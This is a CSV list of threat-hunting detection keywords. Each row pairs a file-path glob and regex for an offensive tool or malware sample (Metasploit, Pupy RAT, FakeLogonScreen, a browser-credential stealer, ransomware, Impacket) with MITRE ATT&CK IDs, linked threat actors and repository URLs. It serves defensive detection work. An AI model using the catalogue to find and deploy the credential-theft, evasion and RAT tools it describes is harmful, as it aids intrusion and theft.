"*\exploit.dll*",".{0,1000}\\exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","15390"
"*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","15391"
"*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","15392"
"*\exploit_suggester.py*",".{0,1000}\\exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15393"
"*\ExploitableSystem.txt*",".{0,1000}\\ExploitableSystem\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","15394"
"*\ExploitElevate.cpp*",".{0,1000}\\ExploitElevate\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","15395"
"*\ExploitGuardProtectionHistory.csv*",".{0,1000}\\ExploitGuardProtectionHistory\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","15396"
"*\ExportCsvCommand.cs",".{0,1000}\\ExportCsvCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15397"
"*\exported_credentials.csv*",".{0,1000}\\exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","15398"
"*\ext_hijacker.h*",".{0,1000}\\ext_hijacker\.h.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","15399"
"*\ExtensionSpoof.exe*",".{0,1000}\\ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15400"
"*\ExtensionSpoof.sln*",".{0,1000}\\ExtensionSpoof\.sln.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15401"
"*\ExtensionSpoofer\*",".{0,1000}\\ExtensionSpoofer\\.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15402"
"*\ExternalC2\*",".{0,1000}\\ExternalC2\\.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","15403"
"*\ExtPassword.chm*",".{0,1000}\\ExtPassword\.chm.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15404"
"*\ExtPassword.html*",".{0,1000}\\ExtPassword\.html.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15405"
"*\extpassword.zip*",".{0,1000}\\extpassword\.zip.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15406"
"*\ExtPassword_lng.ini*",".{0,1000}\\ExtPassword_lng\.ini.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15407"
"*\extract_wifi.exe*",".{0,1000}\\extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15408"
"*\Exymna RAT.exe*",".{0,1000}\\Exymna\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15409"
"*\Fake Error Message RAT.exe*",".{0,1000}\\Fake\sError\sMessage\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15410"
"*\Fake Programs\reshacker.exe*",".{0,1000}\\Fake\sPrograms\\reshacker\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15411"
"*\Fake Programs\team-2.exe*",".{0,1000}\\Fake\sPrograms\\team\-2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15412"
"*\FakeCmdLine*",".{0,1000}\\FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","15413"
"*\FakeLogonScreen.exe*",".{0,1000}\\FakeLogonScreen\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15414"
"*\FakeLogonScreen.exe*",".{0,1000}fakelogonscreen\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15415"
"*\FakeLogonScreen.pdb*",".{0,1000}\\FakeLogonScreen\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15416"
"*\FakeLogonScreen.sln*",".{0,1000}\\FakeLogonScreen\.sln.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15417"
"*\fakelogonscreen-master*",".{0,1000}\\fakelogonscreen\-master.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15418"
"*\fakewarning.dll*",".{0,1000}\\fakewarning\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15419"
"*\FastPathMITM.py*",".{0,1000}\\FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","15420"
"*\fenty.py*",".{0,1000}\\fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","15421"
"*\Ferrari.ps1*",".{0,1000}\\Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15422"
"*\Fertliser.exe*",".{0,1000}\\Fertliser\.exe.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","15423"
"*\Fertliser.pdb*",".{0,1000}\\Fertliser\.pdb.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","15424"
"*\File Encrypter Reverse Bytes.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15426"
"*\File Encrypter Reverse Bytes.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15427"
"*\File Encrypter Reverse Bytes.vshost.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15428"
"*\FILE RECOVERY.txt*",".{0,1000}\\FILE\sRECOVERY\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15429"
"*\File To Base64.exe*",".{0,1000}\\File\sTo\sBase64\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15430"
"*\FileBasic_x64_Release.exe*",".{0,1000}\\FileBasic_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15433"
"*\FileCrawlerMITM.py*",".{0,1000}\\FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","15434"
"*\Files\ContainersFileUrls.txt*",".{0,1000}\\Files\\ContainersFileUrls\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","15435"
"*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15436"
"*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15437"
"*\filetransfer.py*",".{0,1000}\\filetransfer\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","15438"
"*\File-Tunnel-main*",".{0,1000}\\File\-Tunnel\-main.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15439"
"*\File-Tunnel-master*",".{0,1000}\\File\-Tunnel\-master.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15440"
"*\fileUpload.ps1*",".{0,1000}\\fileUpload\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","15441"
"*\find-computer.py*",".{0,1000}\\find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15446"
"*\findDelegation.py*",".{0,1000}\\findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15447"
"*\firefox\getCredsfirefox.h*",".{0,1000}\\firefox\\getCredsfirefox\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","15449"
"*\firefox\getCredsfirefox2.h*",".{0,1000}\\firefox\\getCredsfirefox2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","15450"
"*\follina.py*",".{0,1000}\\follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","15451"
"*\follow_attacker_commands.py*",".{0,1000}\\follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15452"
"*\foobar123\pipe\spoolss*",".{0,1000}\\foobar123\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#namedpipe","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","15453"
"*\Forensia.exe*",".{0,1000}\\Forensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","15454"
"*\forensia.pdb*",".{0,1000}\\forensia\.pdb.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","15455"
"*\Forensike.dmp*",".{0,1000}\\Forensike\.dmp.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15456"
